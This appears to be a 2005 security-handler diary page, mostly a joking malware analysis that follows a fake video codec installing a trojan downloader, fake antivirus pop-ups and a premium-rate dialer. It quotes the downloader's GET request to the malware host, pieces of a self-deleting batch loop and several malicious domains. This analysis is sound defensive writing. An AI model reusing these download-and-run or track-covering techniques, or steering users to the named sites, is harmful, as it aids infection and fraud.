Google Strangeness: Is It New?
While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.
I was talking to the Gypsy and his filthy minkey...
If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for a remote file viewing exploit is forthcoming. More info is available at the GreaseMonkey site:
phpBB 2.0.17 released
This newest release fixes some security issues due to XSS and adds some new functionality.
Tutorial for heavily modded boards:
Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:
1. Make backup
Follow the Bouncing Malware VII: Afterglow
Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:
If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.
Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.
If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.
The story thus far:
(The Reader's Digest version is below, or, you can read the full thing here: )
Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.
Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.
Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)
As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...
Notes/Feedback from FTBM VI:
1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...
2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.
3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:
4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.
While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests, that it formulates based on this data:
that it downloaded in a request to "info.php" on fhgstr.com.
These nine GET requests look like this:
GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1
and, in fact, this downloads the first file, M7081700.so.
M7081700.so is a 7588 byte long executable, that is, once again, packed with FSG. When it is launched, it copies itself to:
and creates two registry keys:
and populates the "run" key with a value entitled "winlogon.exe", which actually points to "msole32.exe".
Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:
Critical System Error!
Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?
"I am malware, therefore, you are infected"
(With sincere apologies to Rene Descartes)
Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).
And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...
The next piece o' malware on today's hit parade is K7111600.so, a 4,611 byte long, executable that (for once!) isn't packed or obfuscated in any way.
Cracking this one open, reveals a couple of interesting strings:
echo > %1
if exist %1 goto start
(note: the links have been slightly altered)
Seems that AntivirusGold is a popular product among malware authors...
The second half of those strings is actually a small DOS batch file that attempts to kill off a particular file, the name of which is passed as a command line parameter. If the file doesn't delete, it simply loops back around and tries again. Once the deletion succeeds, it then deletes itself.
This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't) an executing file cannot be deleted, because it is memory mapped by the operating system and locked from removal. By setting up a looping batch file like this, continually attempting to delete their main executable, when the main program ends, the whole shootin' match disappears.
What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ex-finder.com:
avg.exe: 2,663,231 bytes
dd.exe: 36,864 bytes
I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.
DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe" a 14,848 byte long executable from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that the file that is being downloaded, X.exe, is only about 10K larger than the DA7021900.so downloader... so what is the advantage of using the downloader? Obviously, it would be possible for the malware folks to substitute another file for X.exe, but at the time of writing, this ain't the brightest move they've made.
X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.
So... what's the score-card look like so far? While Joe is watching his movie, he's been treated with the installation of nine pieces of software, three of which we've examined in detail:
M7081700.so - 7,588 bytes
K7111600.so - 4,611 bytes
DA7021900.so - 4,099 bytes
X7081700.so - 2,716 bytes
Z7121900.so - 2,600 bytes
A6291400.so - 34,819 bytes
HP7081700.so - 39,396 bytes
P7091300.so - 21,088 bytes
S7081700.so - 18,036 bytes
The programs that we investigated today installed:
avg.exe - 2,663,231 bytes
dd.exe - 36,864 bytes
X.exe - 14,848 bytes
Joe's dial up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.
But he did get AntivirusGold installed on his machine for free. So how bad could it all be?
Handler on Duty: Tom Liston ( http://www.intelguardians.com )
Jul 21st 2005
1 decade ago